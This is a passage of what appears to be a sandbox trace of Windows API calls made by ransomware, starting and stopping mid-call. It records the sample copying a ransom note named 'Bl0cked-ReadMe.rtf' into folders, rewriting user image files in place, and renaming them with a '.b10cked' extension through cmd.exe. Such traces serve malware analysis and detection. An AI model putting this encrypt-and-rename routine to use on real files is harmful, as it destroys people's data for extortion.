lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.837] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.837] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.838] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.838] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.838] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0138.838] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.838] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.838] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xfb4, dwThreadId=0xfac)) returned 1 [0138.859] CloseHandle (hObject=0x110) returned 1 [0138.859] CloseHandle (hObject=0x114) returned 1 [0138.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0x20 [0138.859] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.859] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.859] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.859] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.859] ReleaseMutex (hMutex=0xf8) returned 1 [0138.860] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\m41m.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19564903975) returned 1 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.860] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18a47 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.861] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1855f [0138.861] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x18a47 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.862] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x18a47 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.863] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc522, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc522, lpOverlapped=0x0) returned 1 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.863] WriteFile (in: hFile=0x114, lpBuffer=0x12596a8*, nNumberOfBytesToWrite=0xc522, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12596a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc522, lpOverlapped=0x0) returned 1 [0138.863] SetFilePointer (in: hFile=0x114, lDistanceToMove=-50466, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc525 [0138.863] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc522, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc522, lpOverlapped=0x0) returned 1 [0138.864] SetFilePointer (in: hFile=0x114, lDistanceToMove=-50466, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc525 [0138.864] WriteFile (in: hFile=0x114, lpBuffer=0x12596a8*, nNumberOfBytesToWrite=0xc522, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12596a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc522, lpOverlapped=0x0) returned 1 [0138.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="m41m.jpg", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0138.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="m41m.jpg", cchWideChar=8, lpMultiByteStr=0x131324c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m41m.jpg", lpUsedDefaultChar=0x0) returned 8 [0138.869] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x18a47 [0138.869] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.869] CloseHandle (hObject=0x114) returned 1 [0138.870] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg") returned 0x21 [0138.870] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.870] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg\" \"C:\\Users\\EEBsYm5\\Desktop\\m41m.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf28, dwThreadId=0xf2c)) returned 1 [0138.963] CloseHandle (hObject=0x110) returned 1 [0138.963] CloseHandle (hObject=0x114) returned 1 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.963] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 1 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.963] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.963] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.963] ReleaseMutex (hMutex=0xf8) returned 1 [0138.964] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.964] ReleaseMutex (hMutex=0xf8) returned 1 [0138.964] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\aR0_1pZCSZwjfY.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\ar0_1pzcszwjfy.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19575319800) returned 1 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb764 [0138.964] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.965] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb764 [0138.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb27c [0138.966] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb764 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb764 [0138.967] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 